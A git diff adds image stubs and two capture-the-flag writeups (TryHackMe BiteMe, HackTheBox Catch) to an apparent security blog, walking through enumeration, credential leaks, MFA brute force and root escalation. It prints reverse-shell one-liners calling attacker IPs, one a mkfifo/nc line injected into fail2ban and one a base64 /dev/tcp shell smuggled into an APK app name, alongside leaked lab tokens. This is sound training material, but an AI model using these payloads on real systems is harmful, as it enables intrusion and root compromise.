index 0000000..f4f8667
--- /dev/null
+++ b/content/writeup-ctf/writeup-biteme-thm/img/image-11.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:319a6d68946a7095a605fb1b396d11f62beef5383450ec5446c3e0c004f7c455
+size 19178
diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-2.png b/content/writeup-ctf/writeup-biteme-thm/img/image-2.png
new file mode 100644
index 0000000..6cca661
--- /dev/null
+++ b/content/writeup-ctf/writeup-biteme-thm/img/image-2.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:499c2f62dcc4bd5e81a54dc83bfc0c7a9746e979b13f429c562dd2fa95597843
+size 57323
diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-2.webp b/content/writeup-ctf/writeup-biteme-thm/img/image-2.webp
new file mode 100644
index 0000000..b59b296
--- /dev/null
+++ b/content/writeup-ctf/writeup-biteme-thm/img/image-2.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:db55ee05553c2b0acb189b441740044f85cc2e91d54024bed41eb299be1ff75f
+size 52796
diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-3.png b/content/writeup-ctf/writeup-biteme-thm/img/image-3.png
new file mode 100644
index 0000000..d12d014
--- /dev/null
+++ b/content/writeup-ctf/writeup-biteme-thm/img/image-3.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:932755c76882e0b1bc8018a285eb5b556f5cb32962e0ff01584bc2f6bdc80656
+size 86905
diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-3.webp b/content/writeup-ctf/writeup-biteme-thm/img/image-3.webp
new file mode 100644
index 0000000..55f1949
--- /dev/null
+++ b/content/writeup-ctf/writeup-biteme-thm/img/image-3.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:e44dbf53b640f388b57bd121b2dca9a53f272ed3e46e72a3d34ca8223bfdaa61
+size 79924
diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-4.png b/content/writeup-ctf/writeup-biteme-thm/img/image-4.png
new file mode 100644
index 0000000..8ac800d
--- /dev/null
+++ b/content/writeup-ctf/writeup-biteme-thm/img/image-4.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:96f2bc47cbd1a694e5d04a6d3e404fb218b3e04653eaf33db41d4d312fb32194
+size 18126
diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-4.webp b/content/writeup-ctf/writeup-biteme-thm/img/image-4.webp
new file mode 100644
index 0000000..bcd9de8
--- /dev/null
+++ b/content/writeup-ctf/writeup-biteme-thm/img/image-4.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:272608ed24040959430b54b0a35d7f92dcb2218bf1d4d3cdb5bddf25b2f48aa5
+size 11342
diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-5.png b/content/writeup-ctf/writeup-biteme-thm/img/image-5.png
new file mode 100644
index 0000000..12da642
--- /dev/null
+++ b/content/writeup-ctf/writeup-biteme-thm/img/image-5.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:526bd90316ce72f1f46b178f07043b4dfd1d90fc09b1210e4d853a56fdddf895
+size 5544
diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-5.webp b/content/writeup-ctf/writeup-biteme-thm/img/image-5.webp
new file mode 100644
index 0000000..71f7b9d
--- /dev/null
+++ b/content/writeup-ctf/writeup-biteme-thm/img/image-5.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:1f51b45d70d966496681460dcc5602cb92e8e40587f97b23c37214670fb3ea26
+size 4120
diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-6.png b/content/writeup-ctf/writeup-biteme-thm/img/image-6.png
new file mode 100644
index 0000000..8db9f4e
--- /dev/null
+++ b/content/writeup-ctf/writeup-biteme-thm/img/image-6.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:7abdcafef6d1624b614efbdf87289be606003843fce2762a777bbaaaf0bede12
+size 6770
diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-6.webp b/content/writeup-ctf/writeup-biteme-thm/img/image-6.webp
new file mode 100644
index 0000000..52c118b
--- /dev/null
+++ b/content/writeup-ctf/writeup-biteme-thm/img/image-6.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:57e91669dfd6dc38e2d9182b2a8c1b2a7b34283e2f36c56d5d3909f35bdee7cb
+size 11588
diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-7.png b/content/writeup-ctf/writeup-biteme-thm/img/image-7.png
new file mode 100644
index 0000000..0d44a2e
--- /dev/null
+++ b/content/writeup-ctf/writeup-biteme-thm/img/image-7.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:82501103aecf2c78124a796e52618fcbe8ad8c6d384ac79f2f918086fa4b0e8e
+size 149970
diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-7.webp b/content/writeup-ctf/writeup-biteme-thm/img/image-7.webp
new file mode 100644
index 0000000..3811fec
--- /dev/null
+++ b/content/writeup-ctf/writeup-biteme-thm/img/image-7.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:3bb0f26f55c6528eeb0820d417d1f6a04835cc325fd778a2841a5fcab16f56e8
+size 146672
diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-8.png b/content/writeup-ctf/writeup-biteme-thm/img/image-8.png
new file mode 100644
index 0000000..7bd2020
--- /dev/null
+++ b/content/writeup-ctf/writeup-biteme-thm/img/image-8.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:e977062c7558272d997318abcfb64fc39f1111b7769dff2171431bc0003ed0e2
+size 42326
diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-8.webp b/content/writeup-ctf/writeup-biteme-thm/img/image-8.webp
new file mode 100644
index 0000000..a3217b9
--- /dev/null
+++ b/content/writeup-ctf/writeup-biteme-thm/img/image-8.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:926b5456fb4ed233bbb5bd4bae8d2f3b1fe763a4603604b02fe9ca66d6e107ca
+size 37152
diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-9.png b/content/writeup-ctf/writeup-biteme-thm/img/image-9.png
new file mode 100644
index 0000000..30ecba1
--- /dev/null
+++ b/content/writeup-ctf/writeup-biteme-thm/img/image-9.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:381126ccacb78010cd9907666475fc82797f0c12510b6728249cc5e80a906a26
+size 16143
diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-9.webp b/content/writeup-ctf/writeup-biteme-thm/img/image-9.webp
new file mode 100644
index 0000000..f0b7b78
--- /dev/null
+++ b/content/writeup-ctf/writeup-biteme-thm/img/image-9.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:3496bcb1d4d6e45e7f461aff86cd3657bb5de894d3d9da45b33a5832b9d5e90e
+size 18106
diff --git a/content/writeup-ctf/writeup-biteme-thm/index.md b/content/writeup-ctf/writeup-biteme-thm/index.md
new file mode 100644
index 0000000..6d4710e
--- /dev/null
+++ b/content/writeup-ctf/writeup-biteme-thm/index.md
@@ -0,0 +1,149 @@
+---
+title: "Writeup - BiteMe (THM)"
+date: 2022-03-21
+slug: "writeup-biteme-thm"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Biteme](https://tryhackme.com/room/biteme) machine from the TryHackMe site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV 10.10.31.162
+```
+Two TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 22/tcp : SSH port (OpenSSH 7.6p1)
+- 80/tcp : HTTP web server (Apache 2.4.29)
+
+## Exploit
+
+First of all I start with a scan of the website pages.
+
+![](img/image-2.webp)
+
+Nothing special, let's try to do the same scan but with a focus on ".php" pages.
+
+![](img/image-3.webp)
+
+Ok, now there are a number of pages, including the "dashboard.php" page which gives us access to a login form.
+
+![](img/image-4.webp)
+
+The page "config.php" which gives us information about a connection identifier.
+
+
+```bash
+ <?php
+
+define('LOGIN_USER', '6a61736f6e5f746573745f6163636f756e74'); 
+```
+The function.php page that gives us the function that checks the password of the connection form.
+
+
+```bash
+ <?php
+include('config.php');
+
+function is_valid_user($user) {
+    $user = bin2hex($user);
+
+    return $user === LOGIN_USER;
+}
+
+// @fred let's talk about ways to make this more secure but still flexible
+function is_valid_pwd($pwd) {
+    $hash = md5($pwd);
+
+    return substr($hash, -3) === '001';
+} 
+```
+Now that we have all this information, we can start working. First of all with a hexa decoder we find the nickname "jason\_test\_account".
+
+Then with the function we can create the following script to determine a working password:
+
+
+```bash
+<?php
+$wordlist = fopen('wordlist/rockyou.txt', 'r');
+
+while (($l = fgets($wordlist)) !== false) {
+        $hash = md5(trim($l));
+        if (substr($hash, -3) === '001') {
+                echo $l;
+                break;
+        }
+}
+fclose($wordlist);
+```
+![](img/image-5.webp)
+
+We can now log in, but it is not finished. The page now asks us for an MFA code. Intercepting the server's response, we find the following in the source code.
+
+![](img/image-6.webp)
+
+This tells us that it is possible to brute force the MFA code, as no anti brute force function is in place. To realize the brute I create in a first time the dictionary of the possibilities with the following command:
+
+
+```bash
+crunch 4 4 0123456789 -o mfa
+```
+Then with Burp Intruder, I test all the possibilities!
+
+I now have access to a page that allows me to see the contents of a folder, or the contents of a file.  So I want to get the id\_rsa of the user Jason to connect in SSH.
+
+![](img/image-7.webp)
+
+But we have a problem : the RSA key is encrypted with a password. To find the password, I use the following commands:
+
+![](img/image-8.webp)
+
+I can now connect in SSH with the user Jason and get the first flag.
+
+
+```bash
+chmod 600 id.jason
+ssh -i id.jason jason@10.10.31.162
+```
+## Privilege escalation
+
+For elevation of privilege, I start by checking the permissions with the "suso -l" command.
+
+![](img/image-9.webp)
+
+I observe that the user Fred has permissions to use the sudo command without a password. So I switch users to find out more.
+
+![](img/image-10.webp)
+
+It turns out that this user can use the command "sudo /bin/systemctl restart fail2ban" without password. This is interesting because in the fail2ban configuration files, you can define commands that will be executed in certain situations. Knowing that the fail2ban service is running with root rights, the commands will be executed as root!
+
+So I go into the "iptables-multiport.conf" file to add commands to get a reverse shell :
+
+
+```bash
+actionban = rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.18.67.218 1234 >/tmp/f
+```
+I then run the following command to restart fail2ban:
+
+
+```bash
+sudo systemctl restart fail2ban
+```
+I now have a root shell and I can get the last flag!
+
+![](img/image-11.webp)
+
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Do not allow access to .phps pages
+- Use a real password verification function
+- Implement an anti-brute force function for the MFA page
+- Don't let sudo be used without a password
diff --git a/content/writeup-ctf/writeup-catch-htb/featured.png b/content/writeup-ctf/writeup-catch-htb/featured.png
new file mode 100644
index 0000000..352f305
--- /dev/null
+++ b/content/writeup-ctf/writeup-catch-htb/featured.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:668b4799997b7b15925b22c6f90caef4dd9a3751f1affc2818a248af11124dce
+size 280600
diff --git a/content/writeup-ctf/writeup-catch-htb/featured.webp b/content/writeup-ctf/writeup-catch-htb/featured.webp
new file mode 100644
index 0000000..7b4ba2f
--- /dev/null
+++ b/content/writeup-ctf/writeup-catch-htb/featured.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:b528a1a5a6d048d10c75127fa07ace3a6f68cff51200dd7ea899519e32b0c1d3
+size 29616
diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-1.png b/content/writeup-ctf/writeup-catch-htb/img/image-1.png
new file mode 100644
index 0000000..2b98e63
--- /dev/null
+++ b/content/writeup-ctf/writeup-catch-htb/img/image-1.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:d6aa240d6b3c7725b181cf04cdc3a63904031a33dab717c3f0dadd83cdc9d1e6
+size 37756
diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-1.webp b/content/writeup-ctf/writeup-catch-htb/img/image-1.webp
new file mode 100644
index 0000000..1143951
--- /dev/null
+++ b/content/writeup-ctf/writeup-catch-htb/img/image-1.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:265befeb32aaef59b25030707307b41895a96465703bc59c340a2a51fd3292cb
+size 25552
diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-2.png b/content/writeup-ctf/writeup-catch-htb/img/image-2.png
new file mode 100644
index 0000000..3c84cf1
--- /dev/null
+++ b/content/writeup-ctf/writeup-catch-htb/img/image-2.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:7f24387998a7dae717a0007afff006b4c1096577533bf6238ed8d4dd7c0ce430
+size 184173
diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-2.webp b/content/writeup-ctf/writeup-catch-htb/img/image-2.webp
new file mode 100644
index 0000000..53c8600
--- /dev/null
+++ b/content/writeup-ctf/writeup-catch-htb/img/image-2.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:37ef389fbbc27ee1d3f89ba9f0d74b32c0c5d6e4b345ab016999cc86133c6f86
+size 51572
diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-3.png b/content/writeup-ctf/writeup-catch-htb/img/image-3.png
new file mode 100644
index 0000000..a212e6f
--- /dev/null
+++ b/content/writeup-ctf/writeup-catch-htb/img/image-3.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:aa141d6db2a20161288bc144939be9db4677f34c00092da99dc8a2982589afab
+size 70981
diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-3.webp b/content/writeup-ctf/writeup-catch-htb/img/image-3.webp
new file mode 100644
index 0000000..332ee2e
--- /dev/null
+++ b/content/writeup-ctf/writeup-catch-htb/img/image-3.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:64214aeff159d78e04417ddedc81cb4f806a210625dc96185ab90e95d68854b3
+size 46066
diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-4.png b/content/writeup-ctf/writeup-catch-htb/img/image-4.png
new file mode 100644
index 0000000..0239894
--- /dev/null
+++ b/content/writeup-ctf/writeup-catch-htb/img/image-4.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:9474c2361eeac9f48e504e21d4e01878155ce6b7bb26cc53f2224f90fa21710a
+size 46023
diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-4.webp b/content/writeup-ctf/writeup-catch-htb/img/image-4.webp
new file mode 100644
index 0000000..e25229a
--- /dev/null
+++ b/content/writeup-ctf/writeup-catch-htb/img/image-4.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:8a548359ed65b9527d24bb8c428e62cbc8154f91b6f8cb8651d1fba84dd7b704
+size 19124
diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-5.png b/content/writeup-ctf/writeup-catch-htb/img/image-5.png
new file mode 100644
index 0000000..17428f2
--- /dev/null
+++ b/content/writeup-ctf/writeup-catch-htb/img/image-5.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:042fbb1fb99e98c40a24e6a9772d255e982a5a37e7bbffa3d2fd325f68fa1348
+size 18024
diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-5.webp b/content/writeup-ctf/writeup-catch-htb/img/image-5.webp
new file mode 100644
index 0000000..1de6fe1
--- /dev/null
+++ b/content/writeup-ctf/writeup-catch-htb/img/image-5.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:712dc68b4094517c892df5e8b10756469b2d3021f213964be581ae7117e2afc8
+size 9138
diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-6.png b/content/writeup-ctf/writeup-catch-htb/img/image-6.png
new file mode 100644
index 0000000..434751a
--- /dev/null
+++ b/content/writeup-ctf/writeup-catch-htb/img/image-6.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:8ba90e475b421c8f3f7a1d6ddb27de9dd91279e43a04fd3669211f05c525881d
+size 80294
diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-6.webp b/content/writeup-ctf/writeup-catch-htb/img/image-6.webp
new file mode 100644
index 0000000..78c012d
--- /dev/null
+++ b/content/writeup-ctf/writeup-catch-htb/img/image-6.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:68213d0ac71604e50d245441f1fa6f2eaa7786b165b11bb6045b7a33be1e57c7
+size 99478
diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-7.png b/content/writeup-ctf/writeup-catch-htb/img/image-7.png
new file mode 100644
index 0000000..533a57c
--- /dev/null
+++ b/content/writeup-ctf/writeup-catch-htb/img/image-7.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:6633b17aaaf81b93539aa83f82b84524eaaeaa300df7f9d512c74685659d96d2
+size 11626
diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-7.webp b/content/writeup-ctf/writeup-catch-htb/img/image-7.webp
new file mode 100644
index 0000000..5da76bf
--- /dev/null
+++ b/content/writeup-ctf/writeup-catch-htb/img/image-7.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:4a9e2b4c9f04b12b767c07d30909bbf5c776a2cb7996048de529e1df89329f7a
+size 11838
diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-8.png b/content/writeup-ctf/writeup-catch-htb/img/image-8.png
new file mode 100644
index 0000000..821708c
--- /dev/null
+++ b/content/writeup-ctf/writeup-catch-htb/img/image-8.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:c8af22711ae5ba67ac14de66f4cc2e79aeeadfca3a77e4708e8b7de0b7f764b6
+size 17196
diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-8.webp b/content/writeup-ctf/writeup-catch-htb/img/image-8.webp
new file mode 100644
index 0000000..8acc1d8
--- /dev/null
+++ b/content/writeup-ctf/writeup-catch-htb/img/image-8.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:65ec1675b299969559bd757b82abb525e6c3f635da324e337c7e43cf05d54607
+size 22672
diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-9.png b/content/writeup-ctf/writeup-catch-htb/img/image-9.png
new file mode 100644
index 0000000..996c43e
--- /dev/null
+++ b/content/writeup-ctf/writeup-catch-htb/img/image-9.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:4a361bcc70158e4180a45edc9de791ce2444168f4cbe206977b5eb9a92999c60
+size 17739
diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-9.webp b/content/writeup-ctf/writeup-catch-htb/img/image-9.webp
new file mode 100644
index 0000000..5ad7bff
--- /dev/null
+++ b/content/writeup-ctf/writeup-catch-htb/img/image-9.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:3780ee70dc721214fdd3c96714174a23aec74bbc0fc668a275769177d3c0021a
+size 18002
diff --git a/content/writeup-ctf/writeup-catch-htb/index.md b/content/writeup-ctf/writeup-catch-htb/index.md
new file mode 100644
index 0000000..6ef53c0
--- /dev/null
+++ b/content/writeup-ctf/writeup-catch-htb/index.md
@@ -0,0 +1,251 @@
+---
+title: "Writeup - Catch (HTB)"
+date: 2022-04-30
+slug: "writeup-catch-htb"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Catch](https://app.hackthebox.com/machines/Catch) machine on the HackTheBox site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV -sC -O -T4 -n -Pn -oA fastscan 10.129.180.130
+```
+Five TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 22/tcp : SSH port (OpenSSH 8.2p1)
+- 80/tcp : HTTP web server (Apache 2.4.41)
+- 3000 : Gitea 1.14.1
+- 5000 : let's Chat
+- 8000 : Cachet (Apache 2.4.41)
+
+![](img/image-2.webp)
+
+## Exploit
+
+At first I start by scanning the files of the site.
+
+![](img/image-3.webp)
+
+Nothing particular, by going on the site, there is the possibility of downloading an application: `catchv1.0.apk`. So I download it, then I unpack it with the following command:
+
+
+```bash
+apktool d catchv1.0.apk
+```
+Then I look for passwords, tokens, ...
+
+
+```bash
+┌──(d3vyce㉿kali)-[~/catchv1.0]
+└─$ find ./ -type f -exec grep -H 'token' {} \;
+./res/values/strings.xml:    <string name="gitea_token">b87bfb6345ae72ed5ecdcee05bcb34c83806fbd0</string>
+./res/values/strings.xml:    <string name="lets_chat_token">NjFiODZhZWFkOTg0ZTI0NTEwMzZlYjE2OmQ1ODg0NjhmZjhiYWU0NDYzNzlhNTdmYTJiNGU2M2EyMzY4MjI0MzM2YjU5NDljNQ==</string>
+./res/values/strings.xml:    <string name="slack_token">xoxp-23984754863-2348975623103</string>
+[...]
+```
+We find 2 tokens, one is for gitea and the other is for lets chat. I choose to start with the second one. At first I generate a request with the help of Burp. Then after some research I find on this [site](https://stackoverflow.com/questions/37302448/lets-chat-authentication-via-ajax-request) that to add a token to the request it is necessary to use `Authorisation: bearer [TOKEN]`. Now that I have the authorization, I start by listing the different rooms:
+
+
+```bash
+GET /rooms HTTP/1.1
+Host: catch.htb:5000
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Authorisation: bearer NjFiODZhZWFkOTg0ZTI0NTEwMzZlYjE2OmQ1ODg0NjhmZjhiYWU0NDYzNzlhNTdmYTJiNGU2M2EyMzY4MjI0MzM2YjU5NDljNQ
+Cookie: connect.sid=s%3APQgPB6T9iE4OkwoXsVLWBTYYv__899Ny.v%2BdKrRNFbDrEQkPjm0kAoxdQfi6%2BsTB0AmPQ1q%2BnKns
+If-None-Match: W/"35c-aAImKzSV1mWHmtGLu5/YkMt+2hk"
+Connection: close
+```
+
+```bash
+HTTP/1.1 200 OK
+X-Frame-Options: SAMEORIGIN
+X-Download-Options: noopen
+X-Content-Type-Options: nosniff
+X-XSS-Protection: 1; mode=block
+Content-Security-Policy: 
+X-UA-Compatible: IE=Edge,chrome=1
+Content-Type: application/json; charset=utf-8
+ETag: W/"35c-aAImKzSV1mWHmtGLu5/YkMt+2hk"
+Vary: Accept-Encoding
+Date: Fri, 22 Apr 2022 10:31:05 GMT
+Connection: close
+Content-Length: 860
+
+[{"id":"61b86b28d984e2451036eb17","slug":"status","name":"Status","description":"Cachet Updates and Maintenance","lastActive":"2021-12-14T10:34:20.749Z","created":"2021-12-14T10:00:08.384Z","owner":"61b86aead984e2451036eb16","private":false,"hasPassword":false,"participants":[]},
+{"id":"61b8708efe190b466d476bfb","slug":"android_dev","name":"Android Development","description":"Android App Updates, Issues & More","lastActive":"2021-12-14T10:24:21.145Z","created":"2021-12-14T10:23:10.474Z","owner":"61b86aead984e2451036eb16","private":false,"hasPassword":false,"participants":[]},
+{"id":"61b86b3fd984e2451036eb18","slug":"employees","name":"Employees","description":"New Joinees, Org updates","lastActive":"2021-12-14T10:18:04.710Z","created":"2021-12-14T10:00:31.043Z","owner":"61b86aead984e2451036eb16","private":false,"hasPassword":false,"participants":[]}]
+```
+I find in the result 3 rooms. I try now to list the messages included in the first room. For that I use the following query:
+
+
+```bash
+GET /rooms/61b86b28d984e2451036eb17/messages HTTP/1.1
+```
+I find several messages including this one:
+
+
+```bash
+[...]
+"id":"61b8702dfe190b466d476bfa","text":"Here are the credentials `john :  E}V!mywu_69T4C}W`",
+"posted":"2021-12-14T10:21:33.859Z",
+"owner":"61b86f15fe190b466d476bf5",
+"room":"61b86b28d984e2451036eb17"
+[...]
+```
+A password and a login! I try to use it on the site hosted on port 8000 :
+
+![](img/image-4.webp)
+
+I find that the panel is version 2.4.0 of Cachet. After some research I find the CVE-2021-39174 which allows to obtain the contents of the variable `DB_username` and `DB_password`. For that I go in the notification parameters I set `Mail Driver` to SMTP. Then I fill `Mail From Address` with the following content: `${DB_username}`. I save and I refresh the page.
+
+I repeat the same procedure for the password.
+
+![](img/image-5.webp)
+
+Finally I find the following credentials: `will / s2#4Fg0_%3!`
+
+I now have SSH access with the user will and I can get the first flag.
+
+![](img/image-6.webp)
+
+## Privilege escalation
+
+I start by running the [linpeas.sh](https://linpeas.sh) script to get an overview of the machine. I quickly find a script belonging to root but that I can read.
+
+![](img/image-7.webp)
+
+
+```bash
+#!/bin/bash                                                                                                                                                                                                                                 
+                                                                                                                                                                                                                                            
+###################                                                                                                                                                                                                                         
+# Signature Check #
+###################
+
+sig_check() {
+        jarsigner -verify "$1/$2" 2>/dev/null >/dev/null
+        if [[ $? -eq 0 ]]; then
+                echo '[+] Signature Check Passed'
+        else
+                echo '[!] Signature Check Failed. Invalid Certificate.'
+                cleanup
+                exit
+        fi
+}
+
+#######################
+# Compatibility Check #
+#######################
+
+comp_check() {
+        apktool d -s "$1/$2" -o $3 2>/dev/null >/dev/null
+        COMPILE_SDK_VER=$(grep -oPm1 "(?<=compileSdkVersion=\")[^\"]+" "$PROCESS_BIN/AndroidManifest.xml")
+        if [ -z "$COMPILE_SDK_VER" ]; then
+                echo '[!] Failed to find target SDK version.'
+                cleanup
+                exit
+        else
+                if [ $COMPILE_SDK_VER -lt 18 ]; then
+                        echo "[!] APK Doesn't meet the requirements"
+                        cleanup
+                        exit
+                fi
+        fi
+}
+
+####################
+# Basic App Checks #
+####################
+
+app_check() {
+        APP_NAME=$(grep -oPm1 "(?<=<string name=\"app_name\">)[^<]+" "$1/res/values/strings.xml")
+        echo $APP_NAME
+        if [[ $APP_NAME == *"Catch"* ]]; then
+                echo -n $APP_NAME|xargs -I {} sh -c 'mkdir {}'
+                mv "$3/$APK_NAME" "$2/$APP_NAME/$4"
+        else
+                echo "[!] App doesn't belong to Catch Global"
+                cleanup
+                exit
+        fi
+}
+
+
+###########
+# Cleanup #
+###########
+
+cleanup() {
+        rm -rf $PROCESS_BIN;rm -rf "$DROPBOX/*" "$IN_FOLDER/*";rm -rf $(ls -A /opt/mdm | grep -v apk_bin | grep -v verify.sh)
+}
+
+
+###################
+# MDM CheckerV1.0 #
+###################
+
+DROPBOX=/opt/mdm/apk_bin
+IN_FOLDER=/root/mdm/apk_bin
+OUT_FOLDER=/root/mdm/certified_apps
+PROCESS_BIN=/root/mdm/process_bin
+
+for IN_APK_NAME in $DROPBOX/*.apk;do
+        OUT_APK_NAME="$(echo ${IN_APK_NAME##*/} | cut -d '.' -f1)_verified.apk"
+        APK_NAME="$(openssl rand -hex 12).apk"
+        if [[ -L "$IN_APK_NAME" ]]; then
+                exit
+        else
+                mv "$IN_APK_NAME" "$IN_FOLDER/$APK_NAME"
+        fi
+        sig_check $IN_FOLDER $APK_NAME
+        comp_check $IN_FOLDER $APK_NAME $PROCESS_BIN
+        app_check $PROCESS_BIN $OUT_FOLDER $IN_FOLDER $OUT_APK_NAME
+done
+cleanup
+```
+In this script one part is particularly interesting:
+
+
+```bash
+if [[ $APP_NAME == *"Catch"* ]]; then
+                echo -n $APP_NAME|xargs -I {} sh -c 'mkdir {}'
+                mv "$3/$APK_NAME" "$2/$APP_NAME/$4"
+```
+The script checks that the word `Catch` is present in the `app_name` variable of the apk file. But what is interesting is that we can put what we want before or after. I go back to the application folder that I had decompiled before. Then in the file `res/values/strings.xml` I modify the value of `app_name`. 
+
+
+```bash
+[...]
+<string name="app_name">Catch|echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjQvMTIzNCAwPiYxCg== | base64 -d | bash -i</string>
+[...]
+```
+After adding a reverse shell, I recompile the application with the following command:
+
+![](img/image-8.webp)
+
+{{< alert >}}
+You need apktool [v2.6.1](https://github.com/iBotPeaches/Apktool/releases/tag/v2.6.1) to do this !I now run the verification script. Then I get a reverse shell as root and I can get the last flag.
+{{< /alert >}}
+
+![](img/image-9.webp)
+
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Do not leave tokens with access to sensitive content in an application available to all
+- Update Cache to avoid CVE-2021-39174 exploit
+- Do not use the same password for the database and a machine user
+- Use a stricter check for the `app_name` variable
diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/featured.png b/content/writeup-ctf/writeup-dc-9-vulnhub/featured.png
new file mode 100644
index 0000000..07b664d
--- /dev/null
+++ b/content/writeup-ctf/writeup-dc-9-vulnhub/featured.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:4473de58c71b203dff425ff1fad94f43dbab3fa64528cc299ede1e598e02015c
+size 182952
diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/featured.webp b/content/writeup-ctf/writeup-dc-9-vulnhub/featured.webp
new file mode 100644
index 0000000..f73454e
--- /dev/null
+++ b/content/writeup-ctf/writeup-dc-9-vulnhub/featured.webp
@@ -0,0 +1,3 @@
